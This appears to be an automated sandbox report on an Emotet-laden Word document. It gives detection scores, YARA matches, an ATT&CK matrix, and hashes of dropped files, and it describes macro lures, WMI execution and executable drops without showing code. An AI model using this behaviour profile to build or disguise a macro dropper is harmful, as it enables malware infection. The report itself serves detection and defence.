Analysis Report sample1.bin
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Classification
Process Tree
Malware Configuration
Threatname: Emotet
Yara Overview
Memory Dumps
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
23 entries in total; the 5 visible ones all match JoeSecurity_Emotet.
Unpacked PEs
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
40 entries in total; the 5 visible ones all match JoeSecurity_Emotet.
Sigma Overview
No Sigma rule has matched
Signature Overview
AV Detection
Antivirus / Scanner detection for submitted sample
Source: Avira
Antivirus detection for dropped file
Source: Avira
Found malware configuration
Source: Malware Configuration Extractor
Multi AV Scanner detection for dropped file
Source: Metadefender
Source: ReversingLabs
Multi AV Scanner detection for submitted file
Source: Virustotal
Source: Metadefender
Source: ReversingLabs
Machine Learning detection for dropped file
Source: Joe Sandbox ML
Machine Learning detection for sample
Source: Joe Sandbox ML
Source: Avira (17 entries)
Source: Code function: 16_2_004725E0, 16_2_00472230, 16_2_00471FC0, 16_2_00471FD8
Source: File opened
Source: Code function: 8_2_006438F0, 9_2_003F38F0, 10_2_003F38F0, 11_2_003338F0, 12_2_004F38F0, 13_2_002938F0, 14_2_01C638F0, 15_2_003F38F0, 16_2_004738F0
Source: Code function: 8_2_0041FA20
Source: TCP traffic
Networking
C2 URLs / IPs found in malware configuration
Source: IPs (101 entries)
Source: Network traffic detected
Source: TCP traffic
Source: IP Address (2 entries)
Source: ASN Name (2 entries)
Source: HTTP traffic detected (2 entries)
Source: TCP traffic detected without corresponding DNS query (13 entries)
Source: File created
Source: HTTP traffic detected (2 entries)
Source: String found in binary or memory (4 entries)
E-Banking Fraud
Yara detected Emotet
Source: File source (72 entries)
Source: Code function: 16_2_004725E0
System Summary
Malicious sample detected (through community Yara rule)
Source: Matched rule
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot OCR (4 entries)
Document contains an embedded VBA macro with suspicious strings
Source: Memory allocated (18 entries)
Source: Code function: 8_2_00620400, 9_2_003E0400, 10_2_00360400, 11_2_00320400, 12_2_004E0400, 13_2_00280400, 14_2_01C10400, 15_2_003E0400, 16_2_00460400
Source: Code function: 9_2_003F8E80
Source: File created
Source: File deleted
Source: Code function: 8_2_0040314D, 8_2_004052D4, 8_2_00409350, 8_2_00406DA8, 8_2_006478B0, 8_2_00641C70, 8_2_006465E0, 9_2_003F1C70, 9_2_003F78B0, 9_2_003F65E0, 10_2_003F1C70, 10_2_003F78B0, 10_2_003F65E0, 11_2_00331C70, 11_2_003378B0, 11_2_003365E0, 12_2_004F1C70, 12_2_004F65E0, 12_2_004F78B0, 13_2_00291C70, 13_2_002978B0, 13_2_002965E0, 14_2_01C665E0, 14_2_01C678B0, 14_2_01C61C70, 15_2_003F1C70, 15_2_003F78B0, 15_2_003F65E0, 16_2_00471C70, 16_2_004765E0, 16_2_004778B0
Source: OLE, VBA macro line (3 entries)
Source: OLE, VBA macro: Name: Document_Close
Source: OLE, VBA macro: Name: Form_Close
Source: OLE indicator, VBA macros
Source: Dropped File
Source: Matched rule
Source: Binary or memory string (2 entries)
Source: Classification label
Source: Code function: 8_2_00648970, 9_2_003F8970, 10_2_003F8970, 11_2_00338970, 12_2_004F8970, 13_2_00298970, 14_2_01C68970, 15_2_003F8970
Source: Code function: 16_2_00474C80
Source: Code function: 8_2_00645040
Source: File created (2 entries)
Source: OLE indicator, Word Document stream
Source: OLE document summary
Source: Console Write (6 entries)
Source: Section loaded (9 entries)
Source: WMI Queries (2 entries)
Source: File read
Source: Key opened
Source: File read (2 entries)
Source: Virustotal
Source: Metadefender
Source: ReversingLabs
Source: Process created (20 entries)
Source: Key value queried
Source: Window detected
Source: Key opened
Source: File opened
Source: Code function: 8_2_004047EF, 8_2_00404037, 8_2_00408893, 8_2_0040611B, 8_2_0040A12F, 8_2_00403233, 8_2_00407223, 8_2_00403233, 8_2_00403287, 8_2_00405B3F, 8_2_004062F7, 8_2_0040AB17, 8_2_00403B4F, 8_2_00404B03, 8_2_00403B47, 8_2_004053E7, 8_2_0040847B, 8_2_00407C78, 8_2_0040A497, 8_2_004074CF, 8_2_004044F3, 8_2_004054B7, 8_2_00404523, 8_2_00404523, 8_2_00406FAF, 8_2_0040A647, 8_2_00403E54, 8_2_0040565F, 8_2_00407E7F, 8_2_00409E0B, 8_2_0040869B
Persistence and Installation Behavior
Creates processes via WMI
Source: WMI Queries (2 entries)
Drops executables to the windows directory (C:\Windows) and starts them
Source: Executable created and started (8 entries)
Source: File created, dropped file (3 entries)
Boot Survival
Drops PE files to the user root directory
Source: File created, dropped file
Hooking and other Techniques for Hiding and Protection
Creates and opens a fake document (probably a fake document to hide exploiting)
Source: Process created
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: File opened (8 entries)
Source: Process information set (184 entries)
Source: Stream path 'Data' entropy
Source: Code function: 8_2_00645040, 9_2_003F5040, 10_2_003F5040, 11_2_00335040, 12_2_004F5040, 13_2_00295040, 14_2_01C65040, 15_2_003F5040
Source: Window / User API (10 entries)
Source: Dropped PE file which has not been started, dropped file
Source: Thread sleep count (16 entries)
Source: Thread sleep time
Source: File Volume queried (8 entries)
Source: Code function: 8_2_006438F0, 9_2_003F38F0, 10_2_003F38F0, 11_2_003338F0, 12_2_004F38F0, 13_2_002938F0, 14_2_01C638F0, 15_2_003F38F0, 16_2_004738F0
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 8_2_00644DF0 | |
Source: | Code function: | 8_2_00643F00 | |
Source: | Code function: | 9_2_003F3F00 | |
Source: | Code function: | 9_2_003F4DF0 | |
Source: | Code function: | 10_2_003F3F00 | |
Source: | Code function: | 10_2_003F4DF0 | |
Source: | Code function: | 11_2_00333F00 | |
Source: | Code function: | 11_2_00334DF0 | |
Source: | Code function: | 12_2_004F3F00 | |
Source: | Code function: | 12_2_004F4DF0 | |
Source: | Code function: | 13_2_00293F00 | |
Source: | Code function: | 13_2_00294DF0 | |
Source: | Code function: | 14_2_01C64DF0 | |
Source: | Code function: | 14_2_01C63F00 | |
Source: | Code function: | 15_2_003F3F00 | |
Source: | Code function: | 15_2_003F4DF0 | |
Source: | Code function: | 16_2_00473F00 | |
Source: | Code function: | 16_2_00474DF0 |
Source: | Code function: | 8_2_00649860 |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 8_2_006480A0 |
Source: | Code function: | 16_2_004753D0 |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information: |
---|
Yara detected Emotet |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation11 | Windows Service12 | Windows Service12 | Disable or Modify Tools1 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1 |
Default Accounts | Scripting12 | Boot or Logon Initialization Scripts | Process Injection11 | Scripting12 | LSASS Memory | System Service Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution11 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information21 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | Command and Scripting Interpreter1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing1 | NTDS | System Information Discovery17 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Service Execution11 | Network Logon Script | Network Logon Script | File Deletion1 | LSA Secrets | Security Software Discovery111 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol112 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading231 | Cached Domain Credentials | Virtualization/Sandbox Evasion1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion1 | DCSync | Process Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection11 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories1 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| | 57% | Virustotal | | Browse |
| | 46% | Metadefender | | Browse |
| | 68% | ReversingLabs | Document-Word.Trojan.Valyria | |
| | 100% | Avira | HEUR/Macro.Downloader.MRYT.Gen | |
| | 100% | Joe Sandbox ML | | |
Dropped Files |
---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| | 100% | Avira | TR/Casdet.xqfgu | |
| | 100% | Joe Sandbox ML | | |
| | 41% | Metadefender | | Browse |
| | 67% | ReversingLabs | Win32.Trojan.Casdet | |
Unpacked PE Files |
---|
| Source | Detection | Scanner | Label | Link | Download |
|---|---|---|---|---|---|
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/Dropper.Gen | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| | 100% | Avira | TR/AD.Emotet.fao | | Download File |
| | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | Virustotal | | Browse |
| | 0% | Avira URL Cloud | safe | |
| | 0% | Avira URL Cloud | safe | |
| | 0% | Avira URL Cloud | safe | |
| | 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| | true | | unknown |
| | true | | unknown |
URLs from Memory and Binaries |
---|
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| | | false | | low |
| | | false | | unknown |
| | | false | | high |
| | | false | | unknown |
Contacted IPs |
---|
Public |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 425356 |
Start date: | 27.05.2021 |
Start time: | 00:16:20 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | sample1.bin (renamed file extension from bin to doc) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winDOC@20/19@0/100 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
00:17:44 | API Interceptor | |
00:17:58 | API Interceptor | |
00:18:01 | API Interceptor | |
00:18:03 | API Interceptor | |
00:18:05 | API Interceptor | |
00:18:07 | API Interceptor | |
00:18:09 | API Interceptor | |
00:18:11 | API Interceptor | |
00:18:14 | API Interceptor | |
00:18:16 | API Interceptor | |
Joe Sandbox View / Context |
---|
IPs |
---|
Domains |
---|
No context |
---|
ASN |
---|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 598272 |
Entropy (8bit): | 5.856822353998229 |
Encrypted: | false |
SSDEEP: | 12288:FmkwUHZaSyYGKFaaGXuG7ttehnyragYqyPhU:FmkVZm2hnyDxAC |
MD5: | 7E9AB23E4F7C98AF0A03B64E3C14D7F6 |
SHA1: | BAD0DC91FB2929FDBF66E569257BABA97E1EC233 |
SHA-256: | 532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE |
SHA-512: | 014420FD9C97DBCFF01E11E385E392D8F9AB91D238A418E76C72CD1CD191D2BEE17E7442398C20BA229AD25B0461778F76A88039B1810E20E88A0FE58C434789 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1191944 |
Entropy (8bit): | 3.9253267830463896 |
Encrypted: | false |
SSDEEP: | 12288:ade8HF9kUxyxlFnsn4yA9W8MZ5axhVYGByJGZGy9e3rfTqtTfLlR1xwSaf67HNu4:me8HFmU/4yA9W89VYU7sY7yz1DsVirpI |
MD5: | DA122309698B26E96848A6A829EEF5C1 |
SHA1: | DFA1B8C96C19827A595EEB15B2EC5386F9746CEF |
SHA-256: | 26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A |
SHA-512: | 4318F2A585966FC03A86D566819F06F15A93BE1616231FC34E4C5B7F0B6317083654B7F9C446D250D91C25176853B8CEB42504419D35ECD7F8DEC4C6048B5D7D |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 600580 |
Entropy (8bit): | 5.850565167047853 |
Encrypted: | false |
SSDEEP: | 12288:nmkTbcqi+vjtKTA4rWgRRtgqDnygr6Yq/PWY:nmkvdbKDnyzx35 |
MD5: | 1D35754EDB0B7AA76891735215FC048A |
SHA1: | E0B1C34B3C39C1F097B7A3749174D098DC51E265 |
SHA-256: | C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348 |
SHA-512: | 6851E23E0FBFF103D5BDCE5CDC4D425C070D8E72BA66525CD2F85255F5BF3921C434C371B1459F184468546670AC26FD307035572E12DF84D1172517E8202A07 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 1.3586208805849456 |
Encrypted: | false |
SSDEEP: | 3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb5:IiiiiiiiiifdLloZQc8++lsJe1MzKn |
MD5: | 9649F0A1F71A4D43EDD7A5BC31B8A43E |
SHA1: | F2A1EBB9CD46A15DAB851068865C0EDA9A7B2CEC |
SHA-256: | A815F7BE46CAC3CD990633D0DC3B30410858FA709DF4220AD8B33DB82AD3ED20 |
SHA-512: | 9128C0D31E59E7870F15DA79BD166C478D29327A378DDF901B716B24A74A811743898ACEF6D81A298FF141A085A8A00F9864B88AB8D954785DDC4FC7F34BB358 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 3660 |
Entropy (8bit): | 4.4937442629551505 |
Encrypted: | false |
SSDEEP: | 96:8uk/XT+tyByK2uk/XT+tyByK2wk/XAt1O2wk/XAt12:8uwwu2uwwu2w/1pw/12 |
MD5: | 0C0513DCA0BF6D1D9AFC673AFB880D3B |
SHA1: | 1A4DDA407197609DAC4A04465360A2B9F7680C5A |
SHA-256: | 5FA898CAD27FF5B3EF16C78FAD38B3CFD67A27847151A7498E16A24E3883EDB6 |
SHA-512: | FE0F4297CC442E9E755B6E681F36FE40FBCC0ABF7A61D6834178BABC64E0B0C8DBF60E4FE250861D39FEF00F2167E8A4CA86C2811529E5AE331827A5469468CD |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1604 |
Entropy (8bit): | 4.470907538306087 |
Encrypted: | false |
SSDEEP: | 24:89p/XRlegvB3q6iL7Y2+G/XRlegvB3q6iL7c:8j/XjstfY2+G/Xjstfc |
MD5: | B82B40CDE8C91EC708728BCAEB6ED185 |
SHA1: | 73DEF80ECE7D0BF0DB7E208F1F3DBAA37EA7E30C |
SHA-256: | A8EC0AFED648FDD1645D7A8603EA8DF354A7CE88C2473080425B516F6019B809 |
SHA-512: | 6ACD2B9A72D586E263E2BED830AF542786454BCBA4DE48A787A991509AFF0ECB6FB90215DD2298558AED87C12373BDDB8D14251259B51A2996714B6AFE87521F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 438 |
Entropy (8bit): | 4.369509432724656 |
Encrypted: | false |
SSDEEP: | 6:M6dYrtg9CMdg9CMdg9UYrtg9CMUg9UYrhMUg9CMRMUg9s:M6IgEEgEEgJgEtg9tgEytgC |
MD5: | 9DDA3519F04FDEEB47B198EDD010E507 |
SHA1: | AC6C4075745C0F0064ADED9504934DDA44CB30E9 |
SHA-256: | A677F9380C0B0EB229D861D18FDDFFD4642FFCAF1ABF9007A77EC37F05F0BDBC |
SHA-512: | 8C0372F4659764915EC4D9EBA74F71E4464F1E5C56A0B31AF05638A747790B9AD2834642D94EB0512AEA1B5D8E292D9CB0029A849A0C91244376A50EC6501667 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1994 |
Entropy (8bit): | 4.503983456170819 |
Encrypted: | false |
SSDEEP: | 48:8Nm/XT0jDJQllhHDlOtQh2Nm/XT0jDJQllhHDlOtQ/:84/XojVtQh24/XojVtQ/ |
MD5: | D79CF64F781B213CE72965233760B911 |
SHA1: | 0EC073D030B6690CD751F9B6F07371F92ECF7077 |
SHA-256: | 205B59476CA151EB3DBC738D47447A7E7CD0E293F3FB56572B7A9B87F2EACE34 |
SHA-512: | 870D1D8140863E81B652685647A97E9DCF7867518D2367BDC8B04D8930E734D8CAE592DC810A22BBA28E79C54657B047DBC3324ABE265313AF25DBC72FB6B734 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\certutil.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 446976 |
Entropy (8bit): | 7.675102075961339 |
Encrypted: | false |
SSDEEP: | 12288:NWSikkQXsGOCAStP1W+TXPc9JXvaWv7j3:ESiL5Sp1W+TYfHj |
MD5: | 706EA7F029E6BC4DBF845DB3366F9A0E |
SHA1: | 942443DFB8784066523DB761886115E08C99575F |
SHA-256: | FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC |
SHA-512: | 036D5DE7E732302EF81989FBA62ABB1375119FC8141748D6548ED2310E95BDC07468ADA5CBF06C4F721B2B95CAF51E3267D4EF6DB2A2031CF5C8B2ABEE1C15A3 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.431160061181642 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 595972 |
Entropy (8bit): | 5.85065356609278 |
Encrypted: | false |
SSDEEP: | 12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9 |
MD5: | D631AB4CEFF199B52FF4E4B7AAD0199D |
SHA1: | F30002C31BF32184507182100942A2012F0B8703 |
SHA-256: | 9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE |
SHA-512: | 56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 595972 |
Entropy (8bit): | 5.85065356609278 |
Encrypted: | false |
SSDEEP: | 12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9 |
MD5: | D631AB4CEFF199B52FF4E4B7AAD0199D |
SHA1: | F30002C31BF32184507182100942A2012F0B8703 |
SHA-256: | 9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE |
SHA-512: | 56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 6.919205506848504 |
TrID: |
|
File name: | sample1.doc |
File size: | 850432 |
MD5: | 7dbd8ecfada1d39a81a58c9468b91039 |
SHA1: | 0d21e2742204d1f98f6fcabe0544570fd6857dd3 |
SHA256: | dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95 |
SHA512: | a851ac80b43ebdb8e990c2eb3daabb456516fc40bb43c9f76d0112674dbd6264efce881520744f0502f2962fc0bb4024e7d73ea66d56bc87c0cc6dfde2ab869a |
SSDEEP: | 12288:emkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCspBZZLFLIx/mBDOq1a:emkvVW9gnyQxtN9eEBDOQa |
File Content Preview: | ........................>.......................g...........j...............Z...[...\...]...^..._...`...a...b...c...d...e...f.................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea2aaa4b4b4a4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "sample1.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
